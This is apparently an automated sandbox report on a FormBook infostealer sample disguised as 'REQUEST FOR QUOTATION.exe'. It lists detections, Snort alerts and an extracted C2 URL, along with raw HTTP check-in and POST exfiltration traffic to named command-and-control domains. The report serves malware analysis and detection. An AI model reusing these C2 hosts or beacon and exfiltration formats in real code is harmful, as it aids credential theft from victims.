
Source: C:\Users\user\AppData\Roaming\JzXynzIhLqqy.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: REQUEST FOR QUOTATION.exe

Joe Sandbox ML: detected

Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Show sources

Source: REQUEST FOR QUOTATION.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: REQUEST FOR QUOTATION.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: systray.pdb source: REQUEST FOR QUOTATION.exe, 00000005.00000002.711557561.0000000001690000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000002.934087091.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: systray.pdbGCTL source: REQUEST FOR QUOTATION.exe, 00000005.00000002.711557561.0000000001690000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: REQUEST FOR QUOTATION.exe, 00000005.00000002.710064884.0000000001190000.00000040.00000001.sdmp, systray.exe, 00000008.00000002.923476107.0000000005190000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: REQUEST FOR QUOTATION.exe, 00000005.00000002.710064884.0000000001190000.00000040.00000001.sdmp, systray.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000002.934087091.0000000005A00000.00000002.00000001.sdmp

Software Vulnerabilities:

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 166.62.28.109:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 166.62.28.109:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 166.62.28.109:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.entrustedhomeinspections.com/xxg/

Source: global traffic	HTTP traffic detected: GET /xxg/?Jt7=XPIX3NrP&GlW8J=a8BlEgGkOe5HuSVVIZfAbA83PDdExW7ERnrZA1n9agEZzoNw0EhQ9Eby65z8jt1XZsvj HTTP/1.1Host: www.premiumnetworkstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xxg/?GlW8J=aA1qKSLvfeXFRK5jYjV15J5OuKIkpVnYprgTABFHZ+NpuMmHjL7rBp7fN9vXv0Msl1t0&Jt7=XPIX3NrP HTTP/1.1Host: www.internationalsoccerteams.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 204.11.56.48 204.11.56.48

Source: Joe Sandbox View	ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View	ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS

Source: global traffic	HTTP traffic detected: POST /xxg/ HTTP/1.1Host: www.premiumnetworkstore.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.premiumnetworkstore.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.premiumnetworkstore.com/xxg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 6c 57 38 4a 3d 53 65 4e 66 61 48 4b 75 4d 38 52 58 33 7a 51 43 57 38 4b 57 42 56 77 68 45 79 70 36 34 56 62 30 50 68 36 76 52 48 6a 46 63 68 30 61 30 49 67 71 34 58 67 46 79 7a 6e 30 6f 4b 6e 30 68 66 6c 58 53 4f 6d 35 49 51 46 50 6d 79 64 61 45 43 47 6f 53 41 48 62 70 35 31 4b 70 50 4b 31 49 34 4a 44 34 6e 42 59 53 4c 55 39 59 59 34 49 53 49 76 5a 31 38 61 6a 54 68 6e 31 58 76 41 57 56 69 47 4d 39 5a 37 63 42 45 73 50 49 43 53 4b 6c 44 72 51 46 6b 58 66 70 69 65 35 50 63 43 49 52 64 42 48 5a 52 4b 34 52 4d 42 41 32 6f 78 63 72 50 47 72 62 58 30 6f 54 57 61 4d 54 37 67 6b 32 34 4f 66 71 52 55 5f 44 47 42 35 67 56 42 42 65 65 35 48 42 6a 64 39 75 4a 77 72 64 6b 50 74 7a 54 46 31 43 76 71 38 28 55 39 4e 51 61 38 72 32 63 56 37 62 6f 39 44 59 74 4f 67 4c 55 44 61 4f 66 74 6e 57 58 72 4b 4d 49 37 35 6f 32 5a 72 4c 32 71 6c 77 67 69 4a 67 70 7a 61 69 51 42 78 6e 42 50 54 71 55 6d 71 65 4a 4a 4c 57 48 6f 4e 4e 67 6a 78 77 71 63 4e 38 71 55 4d 38 49 33 43 58 74 34 70 64 51 51 7a 5a 6d 64 6d 45 31 51 68 66 78 6a 76 33 30 75 44 30 59 4d 76 5a 64 70 5f 4c 52 7a 66 65 76 5a 55 53 55 4c 7a 55 30 6b 51 71 63 55 43 50 5f 58 6a 77 5f 31 31 53 45 36 6c 67 54 65 71 33 44 55 6c 77 4b 4d 74 78 30 67 7a 6f 75 6c 70 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: GlW8J=SeNfaHKuM8RX3zQCW8KWBVwhEyp64Vb0Ph6vRHjFch0a0Igq4XgFyzn0oKn0hflXSOm5IQFPmydaECGoSAHbp51KpPK1I4JD4nBYSLU9YY4ISIvZ18ajThn1XvAWViGM9Z7cBEsPICSKlDrQFkXfpie5PcCIRdBHZRK4RMBA2oxcrPGrbX0oTWaMT7gk24OfqRU_DGB5gVBBee5HBjd9uJwrdkPtzTF1Cvq8(U9NQa8r2cV7bo9DYtOgLUDaOftnWXrKMI75o2ZrL2qlwgiJgpzaiQBxnBPTqUmqeJJLWHoNNgjxwqcN8qUM8I3CXt4pdQQzZmdmE1Qhfxjv30uD0YMvZdp_LRzfevZUSULzU0kQqcUCP_Xjw_11SE6lgTeq3DUlwKMtx0gzoulpng).
Source: global traffic	HTTP traffic detected: POST /xxg/ HTTP/1.1Host: www.premiumnetworkstore.comConnection: closeContent-Length: 170935Cache-Control: no-cacheOrigin: http://www.premiumnetworkstore.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.premiumnetworkstore.com/xxg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 6c 57 38 4a 3d 53 65 4e 66 61 46 72 66 4f 4d 56 47 77 42 6b 48 58 73 62 62 46 55 41 7a 41 77 39 70 28 47 36 46 43 54 7e 5f 52 45 37 42 55 41 6c 66 6a 34 38 71 7e 52 30 43 34 7a 6e 31 71 4b 6e 33 32 76 70 5f 62 39 57 78 49 55 64 6c 6d 79 56 5a 4e 6e 43 74 53 77 47 42 6d 35 6f 35 39 5f 65 75 49 38 73 6a 35 42 67 4c 58 4b 6f 39 46 34 41 4b 65 4d 71 64 38 64 57 6d 51 56 28 4b 56 75 5a 51 55 52 54 6c 39 38 79 7a 57 77 4d 4e 4d 7a 6d 42 67 43 62 34 42 7a 7a 75 6c 53 36 2d 41 2d 28 56 56 2d 31 44 59 55 7e 61 62 75 35 44 36 34 5a 53 39 39 75 6a 4f 32 77 37 55 47 72 39 54 36 6b 53 73 39 4f 4b 35 43 51 4e 50 58 64 66 72 45 31 44 51 50 35 66 46 6d 4a 71 7e 35 42 5f 55 45 28 4d 33 44 5a 67 42 70 6d 73 67 42 70 66 41 2d 74 71 69 2d 38 45 57 62 78 4c 58 4e 28 41 46 31 48 42 41 73 6c 76 58 55 48 77 53 59 37 61 71 32 5a 64 54 55 54 53 6e 53 4f 4f 68 35 69 49 28 44 52 64 70 78 6a 65 7e 78 75 79 42 37 31 57 5a 53 77 52 46 43 36 4f 39 70 77 4b 39 49 49 34 71 34 33 63 64 4f 51 55 64 51 52 4b 5a 6b 31 63 43 42 41 68 5a 30 66 34 33 58 32 48 79 59 4e 74 61 4e 5a 48 42 42 50 50 65 76 42 55 41 52 6e 56 62 69 41 51 74 50 63 42 50 61 6a 6a 33 50 31 31 65 6b 37 36 76 44 72 49 6a 6d 6c 58 77 4d 67 62 34 45 5a 61 70 76 51 6d 35 4f 78 4f 50 65 6f 39 31 38 41 65 33 4b 74 33 66 56 7e 72 50 35 75 50 59 46 6c 53 64 79 6f 77 34 31 34 43 66 70 77 51 36 67 68 45 72 51 30 4a 78 6e 48 79 71 6c 30 73 56 57 55 6e 32 78 47 46 53 36 6c 72 41 2d 73 32 7a 52 47 76 44 6f 6c 51 61 68 79 37 44 36 50 75 28 4d 42 55 47 37 6f 32 42 32 72 7a 4f 6b 62 30 37 52 41 68 44 54 4d 51 65 36 6a 43 71 48 76 44 65 46 34 2d 49 4b 78 4f 6e 4f 76 50 31 45 67 47 75 6b 47 35 30 52 76 76 6e 46 61 41 62 64 7a 67 6f 34 63 5f 49 51 57 32 58 52 52 4b 45 6d 47 72 6a 5f 51 61 4e 63 53 75 58 4e 70 75 35 32 68 72 75 30 48 73 54 44 70 33 6f 48 56 4d 28 73 53 36 6e 79 33 38 6f 36 59 68 43 57 66 4e 46 7a 46 52 6f 37 54 52 36 4c 30 6d 67 37 50 2d 73 63 48 62 36 53 35 48 6e 4d 46 51 63 34 69 6e 39 6b 68 67 56 5f 73 49 39 59 28 56 6e 57 69 70 41 5a 63 55 71 48 62 33 4a 64 37 79 7a 76 57 6b 62 4d 35 63 41 36 51 31 50 62 6e 6f 73 76 4c 31 44 63 5a 53 4e 66 4b 37 37 4f 4a 43 64 6b 33 36 55 74 33 4d 37 4f 76 4e 38 43 53 56 32 56 53 78 46 46 44 7a 5a 72 6a 34 49 67 50 78 70 42 6f 5a 58 43 28 5f 56 6e 4f 48 7e 4c 75 59 74 54 78 74 4d 49 6b 71 28 42 7e 48 6a 41 33 49 53 6d 4f 41 68 38 7e 34 73 6e 32 55 78 77 75 54 4f 38 65 4e 75 53 7e 7a 73 64 48 45 42 69 47 62 6c 37 6d 50 4e 36 41 64 65 69 6a 48 31 76 55 76 61 4a 42 71 49 4e 45 64 76 6b 6e 45 69 5f 57 32 58 68 53 59 72 2d 6c 57 79 41 75 75 45 75 30 43 66 7
Source: global traffic	HTTP traffic detected: POST /xxg/ HTTP/1.1Host: www.internationalsoccerteams.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.internationalsoccerteams.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.internationalsoccerteams.com/xxg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 6c 57 38 4a 3d 53 69 35 51 55 31 47 63 42 74 4c 68 48 6f 34 70 43 32 41 39 67 38 42 41 6f 61 30 4b 76 57 75 59 74 2d 31 69 65 6d 78 4b 5a 4e 56 69 6f 38 36 63 79 6f 4b 6e 4d 2d 47 6f 52 4d 72 65 36 57 77 47 74 6c 73 46 76 72 4d 78 51 68 33 55 61 6c 47 72 36 6a 52 49 4f 6c 6e 58 6e 67 58 41 31 44 69 69 71 37 4f 73 59 67 43 74 34 73 4d 7a 72 66 57 2d 71 47 4f 52 32 57 6b 66 4a 53 4c 59 30 72 78 72 52 6a 75 50 4e 78 44 4b 41 35 53 48 6a 44 28 6b 51 7a 78 61 51 36 73 48 54 37 63 66 79 30 7e 79 7e 49 32 58 37 34 46 5a 5a 62 33 36 32 66 41 7a 56 34 35 6c 46 70 7a 77 63 36 65 49 77 4d 56 33 74 4b 44 30 72 72 4a 4a 72 5f 76 76 31 73 54 4b 56 32 71 75 59 71 4c 58 48 35 31 36 4d 5f 37 30 68 33 58 43 56 79 6e 45 37 53 64 46 31 42 51 70 73 64 64 46 74 49 6c 52 33 65 57 79 47 72 51 78 50 78 32 51 33 63 77 4e 56 53 49 61 5a 76 41 4c 71 70 49 54 48 48 56 2d 45 33 58 4a 32 54 66 38 56 6f 62 5f 45 77 4c 4f 4c 31 67 55 44 31 42 72 35 37 55 4a 51 39 37 2d 7a 57 54 67 41 45 46 4c 6d 33 52 70 6e 75 6b 48 44 75 37 32 75 50 31 50 4d 4d 4f 62 28 5f 71 63 6b 45 48 76 6b 42 46 43 71 33 6a 4e 42 52 70 55 37 6d 62 63 78 75 6b 58 6b 67 4b 77 6a 39 4f 7a 38 57 39 6c 66 32 31 37 44 53 79 5f 46 46 4e 39 69 44 51 54 33 4d 6d 50 4b 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: GlW8J=Si5QU1GcBtLhHo4pC2A9g8BAoa0KvWuYt-1iemxKZNVio86cyoKnM-GoRMre6WwGtlsFvrMxQh3UalGr6jRIOlnXngXA1Diiq7OsYgCt4sMzrfW-qGOR2WkfJSLY0rxrRjuPNxDKA5SHjD(kQzxaQ6sHT7cfy0~y~I2X74FZZb362fAzV45lFpzwc6eIwMV3tKD0rrJJr_vv1sTKV2quYqLXH516M_70h3XCVynE7SdF1BQpsddFtIlR3eWyGrQxPx2Q3cwNVSIaZvALqpITHHV-E3XJ2Tf8Vob_EwLOL1gUD1Br57UJQ97-zWTgAEFLm3RpnukHDu72uP1PMMOb(_qckEHvkBFCq3jNBRpU7mbcxukXkgKwj9Oz8W9lf217DSy_FFN9iDQT3MmPKQ).
Source: global traffic	HTTP traffic detected: POST /xxg/ HTTP/1.1Host: www.internationalsoccerteams.comConnection: closeContent-Length: 170935Cache-Control: no-cacheOrigin: http://www.internationalsoccerteams.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.internationalsoccerteams.com/xxg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 6c 57 38 4a 3d 53 69 35 51 55 33 6e 74 44 39 50 4b 52 4d 4d 73 4e 47 51 44 6b 5f 5a 53 35 4b 59 5a 76 42 6a 76 7a 65 4a 79 65 69 4e 77 53 73 46 38 7e 74 4b 63 6c 2d 7e 73 46 2d 47 76 58 4d 72 5a 73 6d 38 55 67 53 51 4e 76 76 30 4c 51 68 76 58 55 44 36 71 36 7a 52 45 63 31 62 76 76 45 28 58 31 46 69 54 70 64 32 4f 64 68 7e 74 68 61 6b 78 33 75 6d 6c 70 48 79 65 6f 57 49 61 61 6e 32 45 31 62 64 54 51 42 54 61 4b 31 6a 55 46 4b 4f 4d 7e 79 75 4a 42 78 51 55 54 71 49 4b 64 59 67 58 39 33 61 32 28 4a 33 67 33 5a 46 57 54 4c 76 6b 68 66 51 52 51 4e 5a 32 45 35 44 4f 63 35 4f 59 33 35 64 63 70 4e 61 35 6d 35 73 73 7a 65 72 74 28 5f 72 37 52 31 43 66 4c 37 61 7a 66 4c 38 34 66 62 50 74 6d 7a 6d 5a 61 7a 75 79 6f 54 68 5a 39 51 67 64 75 4b 39 4e 76 4c 38 44 38 4e 32 6c 49 61 77 35 49 30 6e 35 36 63 78 52 5a 79 49 64 57 35 30 64 75 50 77 63 45 57 6c 66 62 6b 33 68 34 67 61 2d 57 74 54 33 4b 79 33 6c 62 52 34 59 4d 6d 70 58 76 70 34 34 52 66 6e 4b 78 6d 53 5f 4f 68 6f 4a 6d 33 52 50 6e 71 51 39 44 66 66 32 76 66 55 54 4d 76 58 4a 39 5f 72 4f 6d 30 33 70 7e 69 52 53 71 32 4c 4e 48 6a 78 2d 39 56 4c 63 39 59 6f 55 6e 43 79 77 75 74 4f 7a 6e 47 38 4b 57 55 77 79 41 51 62 67 4b 45 74 48 6f 47 35 52 36 5f 44 35 52 54 28 45 74 62 65 6f 5a 41 6f 77 42 4b 68 35 58 78 44 43 78 57 77 6d 4b 33 50 56 46 45 4d 47 50 6c 42 71 4b 54 38 78 68 7a 70 45 6a 69 32 4d 54 31 77 6d 61 4a 74 6b 56 53 62 61 6b 6b 47 49 57 31 63 65 31 49 71 56 78 50 6b 50 43 71 5a 41 30 68 6d 37 46 41 56 67 72 6f 61 76 62 73 35 71 73 56 72 43 4c 4a 71 47 74 75 4b 65 5a 45 71 77 73 59 50 77 59 59 52 7a 35 49 76 56 55 41 6f 63 70 52 6a 56 49 49 37 2d 63 31 28 4d 66 48 54 4e 62 63 74 5a 5a 70 62 59 51 59 43 35 78 43 4c 58 57 34 6e 5f 34 79 6c 36 67 67 39 4d 50 5f 4a 4d 73 57 41 54 37 75 5a 6f 6a 59 55 64 6b 36 74 78 39 47 7a 6e 7e 31 68 38 7a 57 45 38 61 63 49 4c 73 73 46 6a 33 69 4a 79 35 69 34 59 52 7a 41 36 72 37 55 75 31 38 49 56 62 70 75 43 56 65 47 39 70 6c 63 36 45 52 61 79 79 57 63 63 4d 57 39 68 69 38 55 67 36 62 28 75 4c 54 6a 50 36 51 77 78 58 77 6d 34 45 61 54 70 76 70 44 72 34 49 32 31 33 6d 36 36 33 64 69 74 56 31 48 32 6e 64 61 68 35 5f 61 58 58 6a 46 4d 52 47 34 37 36 64 50 6e 6e 6c 4e 58 6d 68 79 4d 53 52 4f 48 65 51 39 6c 6d 6f 75 5f 74 4a 38 6e 55 77 4e 4e 4b 2d 76 61 64 59 73 4f 52 4f 43 63 30 71 53 38 58 39 57 65 36 33 7e 69 36 52 38 65 28 36 59 55 62 6e 69 49 31 37 4a 44 66 51 28 5f 4c 75 5a 71 56 36 38 76 65 34 56 37 70 33 74 58 35 6f 6e 4f 62 76 37 4d 59 6f 4c 34 37 4a 65 77 6a 33 31 42 55 4b 44 52 51 46 38 46 36 7a 71 57 42 63 4f 57 4

Source: global traffic	HTTP traffic detected: GET /xxg/?Jt7=XPIX3NrP&GlW8J=a8BlEgGkOe5HuSVVIZfAbA83PDdExW7ERnrZA1n9agEZzoNw0EhQ9Eby65z8jt1XZsvj HTTP/1.1Host: www.premiumnetworkstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xxg/?GlW8J=aA1qKSLvfeXFRK5jYjV15J5OuKIkpVnYprgTABFHZ+NpuMmHjL7rBp7fN9vXv0Msl1t0&Jt7=XPIX3NrP HTTP/1.1Host: www.internationalsoccerteams.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.premiumnetworkstore.com

Source: unknown

HTTP traffic detected: POST /xxg/ HTTP/1.1Host: www.premiumnetworkstore.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.premiumnetworkstore.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.premiumnetworkstore.com/xxg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 6c 57 38 4a 3d 53 65 4e 66 61 48 4b 75 4d 38 52 58 33 7a 51 43 57 38 4b 57 42 56 77 68 45 79 70 36 34 56 62 30 50 68 36 76 52 48 6a 46 63 68 30 61 30 49 67 71 34 58 67 46 79 7a 6e 30 6f 4b 6e 30 68 66 6c 58 53 4f 6d 35 49 51 46 50 6d 79 64 61 45 43 47 6f 53 41 48 62 70 35 31 4b 70 50 4b 31 49 34 4a 44 34 6e 42 59 53 4c 55 39 59 59 34 49 53 49 76 5a 31 38 61 6a 54 68 6e 31 58 76 41 57 56 69 47 4d 39 5a 37 63 42 45 73 50 49 43 53 4b 6c 44 72 51 46 6b 58 66 70 69 65 35 50 63 43 49 52 64 42 48 5a 52 4b 34 52 4d 42 41 32 6f 78 63 72 50 47 72 62 58 30 6f 54 57 61 4d 54 37 67 6b 32 34 4f 66 71 52 55 5f 44 47 42 35 67 56 42 42 65 65 35 48 42 6a 64 39 75 4a 77 72 64 6b 50 74 7a 54 46 31 43 76 71 38 28 55 39 4e 51 61 38 72 32 63 56 37 62 6f 39 44 59 74 4f 67 4c 55 44 61 4f 66 74 6e 57 58 72 4b 4d 49 37 35 6f 32 5a 72 4c 32 71 6c 77 67 69 4a 67 70 7a 61 69 51 42 78 6e 42 50 54 71 55 6d 71 65 4a 4a 4c 57 48 6f 4e 4e 67 6a 78 77 71 63 4e 38 71 55 4d 38 49 33 43 58 74 34 70 64 51 51 7a 5a 6d 64 6d 45 31 51 68 66 78 6a 76 33 30 75 44 30 59 4d 76 5a 64 70 5f 4c 52 7a 66 65 76 5a 55 53 55 4c 7a 55 30 6b 51 71 63 55 43 50 5f 58 6a 77 5f 31 31 53 45 36 6c 67 54 65 71 33 44 55 6c 77 4b 4d 74 78 30 67 7a 6f 75 6c 70 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: GlW8J=SeNfaHKuM8RX3zQCW8KWBVwhEyp64Vb0Ph6vRHjFch0a0Igq4XgFyzn0oKn0hflXSOm5IQFPmydaECGoSAHbp51KpPK1I4JD4nBYSLU9YY4ISIvZ18ajThn1XvAWViGM9Z7cBEsPICSKlDrQFkXfpie5PcCIRdBHZRK4RMBA2oxcrPGrbX0oTWaMT7gk24OfqRU_DGB5gVBBee5HBjd9uJwrdkPtzTF1Cvq8(U9NQa8r2cV7bo9DYtOgLUDaOftnWXrKMI75o2ZrL2qlwgiJgpzaiQBxnBPTqUmqeJJLWHoNNgjxwqcN8qUM8I3CXt4pdQQzZmdmE1Qhfxjv30uD0YMvZdp_LRzfevZUSULzU0kQqcUCP_Xjw_11SE6lgTeq3DUlwKMtx0gzoulpng).

Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/arrow.png)
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libg.png)
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libgh.png)
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/logo.png)
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)
Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.673000917.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: systray.exe, 00000008.00000002.924420530.0000000005839000.00000004.00000001.sdmp	String found in binary or memory: http://www.internationalsoccerteams.com
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://www.internationalsoccerteams.com/10_Best_Mutual_Funds.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Bl
Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	String found in binary or memory: http://www.internationalsoccerteams.com/Anti_Wrinkle_Creams.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Blx
